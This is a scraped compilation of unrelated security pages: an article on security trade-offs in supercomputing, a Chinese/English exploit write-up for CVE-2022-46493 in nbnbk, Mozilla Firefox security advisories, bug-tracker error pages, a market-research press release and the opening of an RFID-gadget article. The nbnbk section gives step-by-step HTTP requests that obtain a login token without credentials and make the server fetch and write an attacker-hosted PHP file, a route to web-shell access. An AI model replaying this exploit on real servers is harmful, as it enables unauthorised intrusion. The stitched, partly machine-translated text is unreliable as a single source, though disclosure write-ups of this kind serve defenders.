Vendors and operators attempt to balance power and security, but right now, power is the highest goal.

SUPERCOMPUTING 2022 — How do you keep the bad guys out of some of the world's fastest computers that store some of the most sensitive data?

That was a growing concern at last month's Supercomputing 2022 conference. Achieving the fastest system performance was a hot topic, like it is every year. But the pursuit of speed has come at the cost of securing some of these systems, which run critical workloads in science, weather modeling, economic forecasting, and national security.

Implementing security in the form of hardware or software typically involves a performance penalty, which slows down overall system performance and the output of computations. The push for more horsepower in supercomputing has made security an afterthought.

"For the most part, it's about high-performance computing. And sometimes some of these security mechanisms will reduce your performance because you are doing some checks and balances," says Jeff McVeigh, vice president and general manager of Super Compute Group at Intel.

"There's also a 'I want to make sure I'm getting the best possible performance, and if I can put in other mechanisms to control how this is being securely executed, I'll do that,'" McVeigh says.

**Security Needs Incentivizing**

Performance and data security is a constant tussle between the vendors selling the high-performance systems and the operators who are running the installation.

"Many vendors are reluctant to make these changes if the change negatively impacts the system performance," said Yang Guo, a computer scientist at the National Institutes for Standards and Technology (NIST), during a panel session at Supercomputing 2022.

The lack of enthusiasm for securing high-performance computing systems has prompted the US government to step in, with the NIST creating a working group to address the issue. Guo is leading the NIST HPC Working Group, which focuses on developing guidelines, blueprints, and safeguards for system and data security.

The HPC Working Group was created in January 2016 based on then-President Barack Obama's Executive Order 13702, which launched the National Strategic Computing Initiative. The group's activity picked up after a spate of attacks on supercomputers in Europe, some of which were involved in COVID-19 research.

**HPC Security Is Complicated**

Security in high-performance computing is not as simple as installing antivirus and scanning emails, Guo said.

High-performance computers are shared resources, with researchers booking time and connecting into systems to conduct calculations and simulations. Security requirements will vary based on HPC architectures, some of which may prioritize access control, or hardware like storage, faster CPUs, or more memory for calculations. The top focus is on securing the container and sanitizing computing nodes that pertain to projects on HPC, Guo said.

Government agencies dealing in top-secret data take a Fort Knox-style approach to secure systems by cutting off regular network or wireless access. The "air-gapped" approach helps ensure that malware does not invade the system, and that only authorized users with clearance have access to such systems.

Universities also host supercomputers, which are accessible to students and academics conducting scientific research. Administrators of these systems in many cases have limited control over security, which is managed by system vendors who want bragging rights for building the world's fastest computers.

When you place management of the systems in the hand of vendors, they will prioritize guaranteeing certain performance capabilities, said Rickey Gregg, cybersecurity program manager at the US Department of Defense's High Performance Computing Modernization Program, during the panel.

"One of the things that I was educated on many years ago was that the more money we spend on security, the less money we have for performance. We are trying to make sure that we have this balance," Gregg said.

During a question-and answer session following the panel, some system administrators expressed frustration at vendor contracts that prioritize performance in the system and deprioritize security. The system administrators said that implementing homegrown security technologies would amount to breach of contract with the vendor. That kept their system exposed.

Some panelists said that contracts could be tweaked with language in which vendors hand over security to on-site staff after a certain period of time.

**Different Approaches to Security**

The SC show floor hosted government agencies, universities, and vendors talking about supercomputing. The conversations about security were mostly behind closed doors, but the nature of supercomputing installations provided a birds-eye view of the various approaches to securing systems.

At the booth of the University of Texas at Austin's Texas Advanced Computing Center (TACC), which hosts multiple supercomputers in the Top500 list of the world's fastest supercomputers, the focus was on performance and software. TACC supercomputers get scanned regularly, and the center has tools in place to prevent invasions and two-factor authentication to authorize legit users, representatives said.

The Department of Defense has more of a "walled garden" approach, with users, workloads, and supercomputing resources segmented into a DMZ-stye border area with heavy protections and monitoring of all communications.

The Massachusetts Institute of Technology (MIT) is taking a zero-trust approach to system security by getting rid of root access. Instead it uses a command line entry called sudo to provide root privilege to HPC engineers. The sudo command provides a trail of activities HPC engineers undertake on the system, said Albert Reuther, senior staff member in the MIT Lincoln Laboratory Supercomputing Center, during the panel discussion.

"What we're really after is that auditing of who is at the keyboard, who was that person," Reuther said.

**Improving Security at the Vendor Level**

The general approach to high-performance computing has not changed in decades, with a heavy reliance on giant on-site installations with interconnected racks. That is in sharp contrast to the commercial computing market, which is moving offsite and to the cloud. Participants at the show expressed concerns about data security once it leaves on-premises systems.

AWS is trying to modernize HPC by bringing it to the cloud, which can scale up performance on demand while maintaining a higher level of security. In November, the company introduced HPC7g, a set of cloud instances for high-performance computing on Elastic Compute Cloud (EC2). EC2 employs a special controller called Nitro V5 that provides a confidential computing layer to protect data as it is stored, processed, or in transit.

"We use various hardware additions to typical platforms to manage things like security, access controls, network encapsulation, and encryption," said Lowell Wofford, AWS principal specialist solution architect for high performance computing, during the panel. He added that hardware techniques provide both the security and bare-metal performance in virtual machines.

Intel is building confidential computing features like Software Guard Extensions (SGX), a locked enclave for program execution, into its fastest server chips. According to Intel's McVeigh, a lackadaisical approach by operators is prompting the chip maker to jump ahead in securing high-performance systems.

"I remember when security wasn't important in Windows. And then they realized 'If we make this exposed and every time anyone does anything, they're going to worry about their credit card information being stolen,'" McVeigh said. "So there is a lot of effort there. I think the same things need to apply \[in HPC\]."

Security Is a Second-Class Citizen in High-Performance Computing

Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.

**nbnbk 存在任意文件上传 Getshell**

Nbnbk has any file upload Getshell

**0x00 前言 Preface**

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

**0x01 漏洞复现 Vulnerability Reproduction****1.获取 token**

文件上传的接口需要 access\_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access\_ Token, we can get it from this interface

POST /api/login/wx\_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head\_img=1&nickname=1

可以在返回包中发现 token 已经生成  
You can find that token has been generated in the return package

    HTTP/1.1 200 OK
    Date: Wed, 02 Mar 2022 01:37:25 GMT
    Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
    X-Powered-By: PHP/7.4.21
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST
    Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
    Content-Length: 831
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
    

**2.在 vps 中启动 http 服务**

Start HTTP service in VPS

echo '<?php phpinfo();' \> index.php
python -m http.server 8099

**3.文件上传**

File Upload

POST /api/User/download\_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access\_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access\_token 就是上面获取的 token，url 是文件地址，path 是文件名  
Access\_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

**0x02 漏洞分析**

Vulnerability Analysis

**1.发现危险函数**

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。  
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download\_img 的函数，其中 url 和 path 变量是可控的。  
Double-click to find a download\_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。  
Curl is used directly here to access the url'we provided and path\` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。  
Construct the approach request directly but prompt token error, we need to get token next.

**2.获取token**

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get \`token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数  
Follow Up wxLogin Function

1.  折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2.  通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New \`token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

CVE-2022-46493: 🛡️  Nbnbk has any file upload Getshell · Issue #1 · Fanli2012/nbnbk

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran. This vulnerability affects Firefox < 107.

**Mozilla Foundation Security Advisory 2022-47**

Announced

November 15, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 107

This advisory was updated December 13, 2022 to add CVE-2022-46882 and CVE-2022-46883. Both fixes were included in the original release of Firefox 107, but did not appear in the advisory published at that time.

**#CVE-2022-45403: Service Workers might have learned size of cross-origin media files**

Reporter

Anne van Kesteren and Karl Tomlinson

Impact

high

**Description**

Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined with Range requests might have allowed them to determine the presence or length of a media file.

**References**

*   Bug 1762078

**#CVE-2022-45404: Fullscreen notification bypass**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popup and window.print() calls, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1790815

**#CVE-2022-45405: Use-after-free in InputStream implementation**

Reporter

Atte Kettunen

Impact

high

**Description**

Freeing arbitrary nsIInputStream's on a different thread than creation could have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1791314

**#CVE-2022-45406: Use-after-free of a JavaScript Realm**

Reporter

Samuel Groß

Impact

high

**Description**

If an out-of-memory condition occurred when creating a JavaScript global, a JavaScript realm may be deleted while references to it lived on in a BaseShape. This could lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1791975

**#CVE-2022-45407: Loading fonts on workers was not thread-safe**

Reporter

Armin Ebert

Impact

high

**Description**

If an attacker loaded a font using FontFace() on a background worker, a use-after-free could have occurred, leading to a potentially exploitable crash.

**References**

*   Bug 1793314

**#CVE-2022-45408: Fullscreen notification bypass via windowName**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popups that reuse windowName, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1793829

**#CVE-2022-45409: Use-after-free in Garbage Collection**

Reporter

Gary Kwong

Impact

high

**Description**

The garbage collector could have been aborted in several states and zones and GCRuntime::finishCollection may not have been called, leading to a use-after-free and potentially exploitable crash

**References**

*   Bug 1796901

**#CVE-2022-45410: ServiceWorker-intercepted requests bypassed SameSite cookie policy**

Reporter

Dongsung Kim

Impact

moderate

**Description**

When a ServiceWorker intercepted a request with FetchEvent, the origin of the request was lost after the ServiceWorker took ownership of it. This had the effect of negating SameSite cookie protections. This was addressed in the spec and then in browsers.

**References**

*   Bug 1658869

**#CVE-2022-45411: Cross-Site Tracing was possible via non-standard override headers**

Reporter

scarlet

Impact

moderate

**Description**

Cross-Site Tracing occurs when a server will echo a request back via the Trace method, allowing an XSS attack to access to authorization headers and cookies inaccessible to JavaScript (such as cookies protected by HTTPOnly). To mitigate this attack, browsers placed limits on fetch() and XMLHttpRequest; however some webservers have implemented non-standard headers such as X-Http-Method-Override that override the HTTP method, and made this attack possible again. Firefox has applied the same mitigations to the use of this and similar headers.

**References**

*   Bug 1790311

**#CVE-2022-45412: Symlinks may resolve to partially uninitialized buffers**

Reporter

Armin Ebert

Impact

moderate

**Description**

When resolving a symlink such as file:///proc/self/fd/1, an error message may be produced where the symlink was resolved to a string containing unitialized memory in the buffer.  
_This bug only affects Firefox on Unix-based operated systems (Android, Linux, MacOS). Windows is unaffected._

**References**

*   Bug 1791029

**#CVE-2022-45413: SameSite=Strict cookies could have been sent cross-site via intent URLs**

Reporter

Axel Chong

Impact

moderate

**Description**

Using the S.browser_fallback_url parameter parameter, an attacker could redirect a user to a URL and cause SameSite=Strict cookies to be sent.  
_This issue only affects Firefox for Android. Other operating systems are not affected._

**References**

*   Bug 1791201

**#CVE-2022-40674: Use-after-free vulnerability in expat**

Reporter

Rhodri James

Impact

moderate

**Description**

A flaw in XML parsing could have led to a use-after-free causing a potentially exploitable crash.  
_In official releases of Firefox this vulnerability is mitigated by wasm sandboxing; versions managed by Linux distributions may have other settings._

**References**

*   Bug 1791598

**#CVE-2022-45415: Downloaded file may have been saved with malicious extension**

Reporter

Jefferson Scher and Jayateertha Guruprasad

Impact

moderate

**Description**

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran.

**References**

*   Bug 1793551

**#CVE-2022-45416: Keystroke Side-Channel Leakage**

Reporter

Erik Kraft, Martin Schwarzl, and Andrew McCreight

Impact

moderate

**Description**

Keyboard events reference strings like "KeyA" that were at fixed, known, and widely-spread addresses. Cache-based timing attacks such as Prime+Probe could have possibly figured out which keys were being pressed.

**References**

*   Bug 1793676

**#CVE-2022-45417: Service Workers in Private Browsing Mode may have been written to disk**

Reporter

Kagami

Impact

moderate

**Description**

Service Workers did not detect Private Browsing Mode correctly in all cases, which could have led to Service Workers being written to disk for websites visited in Private Browsing Mode. This would not have persisted them in a state where they would run again, but it would have leaked Private Browsing Mode details to disk.

**References**

*   Bug 1794508

**#CVE-2022-45418: Custom mouse cursor could have been drawn over browser UI**

Reporter

Hafiizh

Impact

moderate

**Description**

If a custom mouse cursor is specified in CSS, under certain circumstances the cursor could have been drawn over the browser UI, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1795815

**#CVE-2022-46882: Use-after-free in WebGL**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

A use-after-free in WebGL extensions could have led to a potentially exploitable crash.  
_Note_: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 107.

**References**

*   Bug 1789371

**#CVE-2022-45419: Deleting a security exception did not take effect immediately**

Reporter

Ronald Crane

Impact

low

**Description**

If the user added a security exception for an invalid TLS certificate, opened an ongoing TLS connection with a server that used that certificate, and then deleted the exception, Firefox would have kept the connection alive, making it seem like the certificate was still trusted.

**References**

*   Bug 1716082

**#CVE-2022-45420: Iframe contents could be rendered outside the iframe**

Reporter

Suhwan Song of SNU CompSec Lab

Impact

low

**Description**

Using tables inside of an iframe, an attacker could have caused iframe contents to be rendered outside the boundaries of the iframe, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1792643

**#CVE-2022-45421: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Andrew McCreight and Gabriele Svelto reported memory safety bugs present in Firefox 106 and Firefox ESR 102.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**#CVE-2022-46883: Memory safety bugs fixed in Firefox 107**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Gabriele Svelto, Yulia Startsev, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 106. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.  
_Note_: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. The fix was included in the original release of Firefox 107.

**References**

*   Memory safety bugs fixed in Firefox 107

CVE-2022-45415: Security Vulnerabilities fixed in Firefox 107

An iframe that was not permitted to run scripts could do so if the user clicked on a <code>javascript:</code> link. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11.

**Mozilla Foundation Security Advisory 2022-24**

Announced

June 28, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 102

_Note_: While Bug 1771084 does not represent a specific vulnerability that was fixed, we recommend anyone rebasing patches to include it. 102 branch: Patch 1 and 2. 91 Branch: Patch 1 and 2 (Despite saying Parts 2 and 3, there is no Part 1)

**#CVE-2022-34479: A popup window could be resized in a way to overlay the address bar with web content**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A malicious website that could create a popup could have resized the popup to overlay the address bar with its own content, resulting in potential user confusion or spoofing attacks.  
_This bug only affects Firefox for Linux. Other operating systems are unaffected._

**References**

*   Bug 1745595

**#CVE-2022-34470: Use-after-free in nsSHistory**

Reporter

Armin Ebert

Impact

high

**Description**

Session history navigations may have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1765951

**#CVE-2022-34468: CSP sandbox header without \`allow-scripts\` can be bypassed via retargeted javascript: URI**

Reporter

Armin Ebert

Impact

high

**Description**

An iframe that was not permitted to run scripts could do so if the user clicked on a javascript: link.

**References**

*   Bug 1768537

**#CVE-2022-34482: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Attila Suszter

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34483.

**References**

*   Bug 845880

**#CVE-2022-34483: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Eduardo Braun Prado

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34482.

**References**

*   Bug 1335845

**#CVE-2022-34476: ASN.1 parser could have been tricked into accepting malformed ASN.1**

Reporter

Gustavo Grieco

Impact

moderate

**Description**

ASN.1 parsing of an indefinite SEQUENCE inside an indefinite GROUP could have resulted in the parser accepting malformed ASN.1.

**References**

*   Bug 1387919

**#CVE-2022-34481: Potential integer overflow in ReplaceElementsAt**

Reporter

Ronald Crane

Impact

moderate

**Description**

In the nsTArray_Impl::ReplaceElementsAt() function, an integer overflow could have occurred when the number of elements to replace was too large for the container.

**References**

*   Bug 1497246
*   Bug 1483699

**#CVE-2022-34474: Sandboxed iframes could redirect to external schemes**

Reporter

Amazon Malvertising Team

Impact

moderate

**Description**

Even when an iframe was sandboxed with allow-top-navigation-by-user-activation, if it received a redirect header to an external protocol the browser would process the redirect and prompt the user as appropriate.

**References**

*   Bug 1677138

**#CVE-2022-34469: TLS certificate errors on HSTS-protected domains could be bypassed by the user on Firefox for Android**

Reporter

Peter Gerber

Impact

moderate

**Description**

When a TLS Certificate error occurs on a domain protected by the HSTS header, the browser should not allow the user to bypass the certificate error. On Firefox for Android, the user was presented with the option to bypass the error; this could only have been done by the user explicitly.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1721220

**#CVE-2022-34471: Compromised server could trick a browser into an addon downgrade**

Reporter

Rob Wu

Impact

moderate

**Description**

When downloading an update for an addon, the downloaded addon update's version was not verified to match the version selected from the manifest. If the manifest had been tampered with on the server, an attacker could trick the browser into downgrading the addon to a prior version.

**References**

*   Bug 1766047

**#CVE-2022-34472: Unavailable PAC file resulted in OCSP requests being blocked**

Reporter

Laurent Bigonville

Impact

moderate

**Description**

If there was a PAC URL set and the server that hosts the PAC was not reachable, OCSP requests would have been blocked, resulting in incorrect error pages being shown.

**References**

*   Bug 1770123

**#CVE-2022-34478: Microsoft protocols can be attacked if a user accepts a prompt**

Reporter

Gijs

Impact

moderate

**Description**

The ms-msdt, search, and search-ms protocols deliver content to Microsoft applications, bypassing the browser, when a user accepts a prompt. These applications have had known vulnerabilities, exploited in the wild (although we know of none exploited through Firefox), so in this release Firefox has blocked these protocols from prompting the user to open them.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1773717

**#CVE-2022-2200: Undesired attributes could be set as part of prototype pollution**

Reporter

Manfred Paul via Trend Micro's Zero Day Initiative

Impact

moderate

**Description**

If an object prototype was corrupted by an attacker, they would have been able to set undesired attributes on a JavaScript object, leading to privileged code execution.

**References**

*   Bug 1771381

**#CVE-2022-34480: Free of uninitialized pointer in lg\_init**

Reporter

Ronald Crane

Impact

low

**Description**

Within the lg_init() function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated.

**References**

*   Bug 1454072

**#CVE-2022-34477: MediaError message property leaked information on cross-origin same-site pages**

Reporter

jannis

Impact

low

**Description**

The MediaError message property should be consistent to avoid leaking information about cross-origin resources; however for a same-site cross-origin resource, the message could have leaked information enabling XS-Leaks attacks.

**References**

*   Bug 1731614

**#CVE-2022-34475: HTML Sanitizer could have been bypassed via same-origin script via use tags**

Reporter

Gareth Heyes

Impact

low

**Description**

SVG <use> tags that referenced a same-origin document could have resulted in script execution if attacker input was sanitized via the HTML Sanitizer API. This would have required the attacker to reference a same-origin JavaScript file containing the script to be executed.

**References**

*   Bug 1757210

**#CVE-2022-34473: HTML Sanitizer could have been bypassed via use tags**

Reporter

Armin Ebert

Impact

low

**Description**

The HTML Sanitizer should have sanitized the href attribute of SVG <use> tags; however it incorrectly did not sanitize xlink:href attributes.

**References**

*   Bug 1770888

**#CVE-2022-34484: Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11**

Reporter

Mozilla developers and community

Impact

high

**Description**

The Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101 and Firefox ESR 91.10. Some of these bugs showed evidence of JavaScript prototype or memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11

**#CVE-2022-34485: Memory safety bugs fixed in Firefox 102**

Reporter

Mozilla developers and community

Impact

moderate

**Description**

Mozilla developers Bryce Seager van Dyk and the Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102

CVE-2022-34468: Security Vulnerabilities fixed in Firefox 102

Mozilla VPN can load an OpenSSL configuration file from an unsecured directory. A user or attacker with limited privileges could leverage this to launch arbitrary code with SYSTEM privilege. This vulnerability affects Mozilla VPN < 2.7.1.

Sorry, I can't find "_1752291?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-0517: Invalid Bug ID

During the plaintext phase of the STARTTLS connection setup, protocol commands could have been injected and evaluated within the encrypted session. This vulnerability affects Thunderbird < 78.7.

Sorry, I can't find "_1622640?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-15685: Invalid Bug ID

**SAN FRANCISCO****,** **Dec. 22, 2022** **/PRNewswire/ --** The global passwordless authentication market size is expected to reach USD 55.70 billion by 2030, growing at promising 18.2% CAGR, according to a new report by Grand View Research, Inc. Passwordless authentication is a security procedure that uses unique biological traits of a person to validate their authenticity.

**Key Industry Insights & Findings from the report:**

*   Growing investments in developed countries such as the U.S., Canada, Germany, France, and the U.K. for implementing passwordless authentication technology is a crucial factor driving the growth.
*   Fingerprint recognition and facial recognition provide various benefits. The increased security, accountability, convenience, and their non-transferable nature are crucial drivers for the growth.
*   The surge in e-commerce and internet banking, as well as legislations by various authorities such as central banks mandates large organizations to utilize robust authentication mechanisms to authenticate customers.
*   Multi-factor authentication protects clients from phishing attempts and fraudulent purchases and secures transactions.

Read 117-page market research report, "Passwordless Authentication Market Size, Share & Trends Analysis Report By Component, By Product Type (Facial Recognition, Fingerprint, Iris), By Authentication Type, By Portability, By End-user, By Region, And Segment Forecasts, 2022 - 2030", published by Grand View Research.

**Passwordless Authentication Market Growth & Trends**

The increasing adoption of smartphones and other electronic gadgets is a crucial element driving the biometric authentication market forward. According to a July 2022 Oxford Economics and Samsung study, up to 85% of small and midsize enterprises allow all or most of their staff to use mobile devices for work. Personal laptops and smartphones used by employees might expose a small firm to the dangers of unauthorized access to proprietary data, files, and systems. Such solutions remain the need of the hour and growing focus of many companies around the world.

For instance, in September 2022, AaDya Security, a cyber-security firm, announced the availability of passwordless authentication for Judy, the first all-in-one cybersecurity solution for SMEs. The new security feature protects how small business employees access company resources, mainly when they operate remotely and on mobile phones and personal laptops.

The growing requirement for an additional layer of protection beyond passwords fuels the growth of the passwordless authentication industry. To authenticate identities, fingerprint sensors and smartcards are utilized, and these security points allow for a seamless experience and data flow across locations. Most businesses are using voice biometric authentication in their workplaces for their personnel.

Reduced fraud exposure and lower authentication costs often drive organizations to implement voice biometric technology in their facilities. For instance, in July 2022, Turant Inc., a voice biometric AI firm, launched its cutting-edge AI solution in India. The company seeks to eliminate OTP-related fraud in transactions across use cases across business/industry domains, including e-commerce deliveries, by making it available in all Indian languages and roughly 20,000 dialects.

Furthermore, due to the increasing number of incidences of data theft around the world, passwordless authentication has gained popularity. Data theft issues in devices such as computers, cellphones, and tablets have increased the requirement for protection beyond passwords. fingerprint sensors and facial recognition are ways modern gadgets can be secured to prevent data theft.

For instance, in August 2022, ForgeRock, an international identity and access management software business, established strategic cooperation with Israeli software company Secret Double Octopus. ForgeRock will use SDO technology to provide employees, contractors, and vendors with a unified multi-factor secure experience. ForgeRock Enterprise Connect, the new solution, connects effortlessly with any ForgeRock deployment option, allowing organizations to gain increased security for databases, workstations, VPNs, and servers.

**Passwordless Authentication Market Segmentation**

Grand View Research has segmented the global passwordless authentication market based on component, product type, authentication type, portability, end-user, and region:

**Passwordless Authentication Market - Component Outlook (Revenue, USD Million, 2017 - 2030)**

*   Hardware
*   Software
*   Services

**Passwordless Authentication Market - Product Type Outlook (Revenue, USD Million, 2017 - 2030)**

*   Fingerprint Authentication
*   Palm Recognition
*   Iris Recognition
*   Face Recognition
*   Voice Recognition
*   Smart Card
*   Others

**Passwordless Authentication Market - Type Outlook (Revenue, USD Million, 2017 - 2030)**

*   Single-factor Authentication
*   Multi-factor Authentication

**Passwordless Authentication Market - Portability Outlook (Revenue, USD Million, 2017 - 2030)**

*   Fixed
*   Mobile

**Passwordless Authentication Market - End-user Outlook (Revenue, USD Million, 2017 - 2030)**

*   IT & Telecom
*   Retail
*   Transportation & Logistics
*   Aerospace & Defense
*   BFSI
*   Healthcare
*   Government
*   Others

**Passwordless Authentication Market - Regional Outlook (Revenue, USD Million, 2017 - 2030)**

*   North America

*   U.S.
*   Canada
*   Mexico

*   Europe

*   U.K.
*   Germany
*   France

*   Asia Pacific

*   China
*   India
*   Japan

*   Central & South America

*   Brazil

*   Middle East and Africa (MEA)

**List of Key Players in the Passwordless Authentication Market**

*   ASSA ABLOY
*   DERMALOG Identification Systems GmbH
*   East Shore Technology, LLC
*   Fujitsu
*   HID Global Corporation
*   M2SYS Technology
*   Microsoft
*   NEC Corporation
*   Safran
*   Thales.

**Check out more related studies published by Grand View Research:**

*   Facial Recognition Market **\-** The global facial recognition market size is expected to reach USD 12.11 billion by 2028 according to a new report by Grand View Research, Inc. The market is anticipated to expand at a CAGR of 15.4% from 2021 to 2028. Facial recognition is a contactless biometric solution that is a critical factor contributing the market growth.
*   Multi-factor Authentication Market \- The global multi-factor authentication (MFA) market size is expected to reach USD 17.76 billion by 2025, according to a new study by Grand View Research, Inc., experiencing a CAGR of 15.07% during the forecast period. Increasing implementation of BYOD and cloud-based services across enterprises, along with the growing security regulations and mandates, is benefiting market growth.
*   3D Secure Payment Authentication Market \- The global 3D secure payment authentication market size is expected to reach USD 2.76 billion by 2030, growing at a CAGR of 12.2% from 2022 to 2030, according to a new study conducted by Grand View Research, Inc. The rising demand for e-commerce has augmented the use of Card Not Present (CNP) transactions. As a result of such an increase in CNP transactions, the growth in CNP fraud transactions has been observed over the past few years.

**Browse through Grand View Research's** Next Generation Technologies Industry **Research Reports.**

**About Grand View Research**

Grand View Research, U.S.-based market research and consulting company, provides syndicated as well as customized research reports and consulting services. Registered in California and headquartered in San Francisco, the company comprises over 425 analysts and consultants, adding more than 1200 market research reports to its vast database each year. These reports offer in-depth analysis on 46 industries across 25 major countries worldwide. With the help of an interactive market intelligence platform, Grand View Research Helps Fortune 500 companies and renowned academic institutes understand the global and regional business environment and gauge the opportunities that lie ahead.

Passwordless Authentication Market to Be Worth $55.7 Billion by 2030: Grand View Research, Inc.

Don’t be fooled by its fun name and Tamagotchi-like interface—this do-everything gadget is trouble waiting to happen and a whole lot more.

Across the US, countless buildings, from government offices to your next hotel room door, are protected by RFID-controlled locks. On a recent trip to my office, I passed nearly 20 of these keyless entry systems, which are among the most pervasive in the world. But a playful palm-sized gadget with a Tamagotchi-like interface can likely thwart the locks on many of these doors. 

